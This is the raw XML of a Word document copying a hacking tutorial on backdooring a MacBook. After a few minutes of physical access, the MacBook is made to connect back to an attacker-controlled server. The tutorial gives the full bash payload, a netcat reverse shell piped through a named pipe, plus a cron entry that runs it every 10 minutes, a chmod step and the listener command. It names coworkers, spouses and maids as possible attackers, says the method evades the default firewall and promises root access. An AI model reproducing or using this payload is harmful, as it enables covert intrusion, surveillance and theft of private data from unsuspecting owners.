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2B" w:rsidRPr="0086632B" w:rsidRDefault="0086632B" w:rsidP="00DE60D3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Cs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>How to Connect to MacBook Backdoors from anywhere in the World</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE60D3" w:rsidRDefault="00DE60D3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bookmarkStart w:id="0" w:name="_GoBack"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="0086632B" w:rsidRPr="0086632B" w:rsidRDefault="00DE60D3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0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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</w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637/" </w:instrText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</w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0086632B" w:rsidRPr="0086632B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Backdooring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0086632B" w:rsidRPr="0086632B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a powered-off MacBook</w:t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</w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0086632B" w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is easy when a few minutes of physical access is allowed. That attack works well if the hacker also shares a Wi-Fi network with the victim, but this time, I'll show how to remotely establish a connection to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0086632B" w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backdoored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0086632B" w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> MacBook as it moves between different Wi-Fi networks.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I've already shown how to backdoor a MacBook </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:anchor="jump-step4" w:history="1"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using a simple </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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Netcat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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payload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This time, instead of creating a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listener on the laptop and using an incoming connection to control it, the listener is created on an </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1"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attacker-controlled VPS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (virtual private server), and the MacBook periodically uses outgoing transmissions to connect to it. The roles of the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commands are reversed; the attacker waits for incoming connections. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/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macOS</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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default firewall settings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> only filter </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1"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incoming connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, so this will entirely evade default firewall configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086632B" w:rsidRPr="0086632B" w:rsidRDefault="0086632B" w:rsidP="0086632B">
      <w:pPr>
        <w:spacing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 xml:space="preserve">Previously: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0086632B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How to Configure a Backdoor on Anyone's MacBook</w:t>
        </w:r>
      </w:hyperlink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This kind of </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="jump-step4" w:history="1"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physical attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be performed by coworkers, neighbors, hotel maids, roommates, friends, spouses, or anyone with a few minutes of physical access to the target MacBook.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>Step 1</w:t>
      </w:r>
      <w:r w:rsidR="0096250A"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</w:t>
      </w:r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>Purchase the VPS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>There are no particular VPS configurations required in this method. A VPS with minimum specifications will perform well for this specific attack as there will not be any powerful CPU or RAM usage required.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>The VPS should be online and accessible via SSH before booting the MacBook into single-user mode. Take note of the VPS's IP address, as it's required in the next step.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086632B" w:rsidRPr="0086632B" w:rsidRDefault="0086632B" w:rsidP="0086632B">
      <w:pPr>
        <w:spacing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 xml:space="preserve">Don't Miss: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="0086632B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The White Hat's Guide to Choosing a Virtual Private Server</w:t>
        </w:r>
      </w:hyperlink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>Step 2</w:t>
      </w:r>
      <w:r w:rsidR="0096250A"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</w:t>
      </w:r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Create the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Payload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lastRenderedPageBreak/>
        <w:t xml:space="preserve">This method is a standalone method and does not require the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payload used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1"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my previous article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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While in </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="jump-step1" w:history="1"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single-user mode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, instead of creating a listener on the MacBook,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will be used to periodically connect to the attacker's server at a set interval. To do this, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nano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can be used to save the below BASH script into a file called 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payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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spellStart"/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nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/payload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Type the below script into the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nano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terminal (The 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VPS-IP-ADDRESS-HERE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 should be changed to the attacker's IP address for the VPS), then save and exit by pressing </w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ctrl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 + </w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X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, then </w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Y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, then </w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Return</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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#!/</w:t>
      </w:r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>bin/bash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86632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n=$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux | grep -o [1]234)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if</w:t>
      </w:r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 xml:space="preserve"> [[ $n = "" ]]; then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86632B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spellStart"/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mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> f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86632B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spellStart"/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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> VPS-IP-ADDRESS-HERE 1234 &lt; f | /bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B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86632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; f 2&gt;&amp;1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fi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Much like </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:anchor="jump-step4" w:history="1"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my previous BASH script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, the first line (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n=$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> aux | grep -o [1]234)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), creates a variable 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n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, which checks to see if port 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1234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 is already open. This port detection is achieved using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ps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>, a tool used to view running background processes.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>The following line (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if [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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[ $</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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n = "" ]]; then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) is the start of an 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if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 statement which says </w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if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 the variable 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n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 (port 1234) is not found, </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/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mkfifo</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, a tool used to create a "named pipe," will create a file called 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f</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. The filename here is totally arbitrary and uses "f" for simplicity.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Following the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mkfifo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command is the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command (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> VPS-IP-ADDRESS-HERE 1234 &lt; f | /bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> &gt; f 2&gt;&amp;1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) which is the primary difference compared to my previous script. Instead of opening a port, it tries to connect to port 1234 on the attacker-controlled VPS. Commands are again piped using the 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f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 file to grant the attacker access to a full BASH terminal.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As said before, the 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VPS-IP-ADDRESS-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be changed to the attacker's IP address for the VPS. For example, if the attacker's IP address were 11.22.33.44, that line of the script would appear as such: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spellStart"/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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 11.22.33.44 1234 &lt; f | /bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B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86632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; f 2&gt;&amp;1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lastRenderedPageBreak/>
        <w:t>Step 3</w:t>
      </w:r>
      <w:r w:rsidR="0096250A"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</w:t>
      </w:r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Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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to Execute the Payload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Next, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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crontab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, a feature of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cron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>, will be used to schedule the BASH script ("payload") to execute every 10 minutes. The below command can be used to accomplish this.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spellStart"/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env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> EDITOR=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B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86632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e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A new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nano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terminal will open. Type the below into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nano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>, then save and exit the terminal.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86632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/10 * * * * /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/payload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Readers interested in scheduling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cronjobs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at intervals other than 10 minutes should check out </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/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TecAdmin's</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0086632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useful article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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>Step 4</w:t>
      </w:r>
      <w:r w:rsidR="0096250A"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</w:t>
      </w:r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>Elevate the Payload File Permissions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Lastly, the payload file permissions should be upgraded using the below </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0086632B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chmod</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. This will allow the payload to execute without user input.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spellStart"/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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 777 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/payload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>Step 5</w:t>
      </w:r>
      <w:r w:rsidR="0096250A"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</w:t>
      </w:r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>Shut Down the MacBook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>When that's done, enter the below command into the single-user terminal to shut down the laptop.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shutdown</w:t>
      </w:r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 xml:space="preserve"> -h now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That's it for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backdooring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the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macOS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device. When the owner of the laptop turns the device on, the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command will execute every 10 minutes and attempt to connect to the attacker's server. If the server is not online, the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command will continue to fail silently and try again at the next interval.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</w:rPr>
      </w:pPr>
      <w:r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>Step 6</w:t>
      </w:r>
      <w:r w:rsidR="0096250A" w:rsidRPr="0096250A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Wait for Incoming Connections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Now, with the MacBook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backdoored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, the final step is to start the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listener on the VPS and wait for an incoming connection. This can be done using the below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command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086632B" w:rsidRPr="0086632B" w:rsidRDefault="0086632B" w:rsidP="0086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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l -p 1234</w:t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lastRenderedPageBreak/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will listen (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-l</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) for incoming connections on every available interface on port (</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) 1234. That's all there is to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086632B" w:rsidRPr="0086632B" w:rsidRDefault="0086632B" w:rsidP="0086632B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5715000" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/09/23/63661594644635/0/hacking-macos-connect-macbook-backdoors-from-anywhere-world.w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wonderhowto.com/img/09/23/63661594644635/0/hacking-macos-connect-macbook-backdoors-from-anywhere-world.w1456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32B" w:rsidRPr="0086632B" w:rsidRDefault="0086632B" w:rsidP="0086632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86632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When a new 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Netcat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connection is established, the attacker will have full root access to the compromised MacBook. In upcoming articles, I'll show a few post-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explotation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086632B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tricks such as reading private Mail messages, dumping Chrome browser data, and escalating privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C623C" w:rsidRPr="0086632B" w:rsidRDefault="002C623C" w:rsidP="0086632B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C623C" w:rsidRPr="0086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40A4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C36E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08"/>
    <w:rsid w:val="002C623C"/>
    <w:rsid w:val="00673608"/>
    <w:rsid w:val="0086632B"/>
    <w:rsid w:val="0096250A"/>
    <w:rsid w:val="00BD73D4"/>
    <w:rsid w:val="00D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5E4FA-F3E3-4E0C-93E8-618C24B4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6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3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632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6632B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="series">
    <w:name w:val="series"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0086632B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008663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6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gin-label">
    <w:name w:val="margin-label"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008663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3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632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63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9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53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036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77627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00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0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twork_layer_firewall" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/09/23/63661594644635/0/636615946446350923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upport.apple.com/en-us/HT201642" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 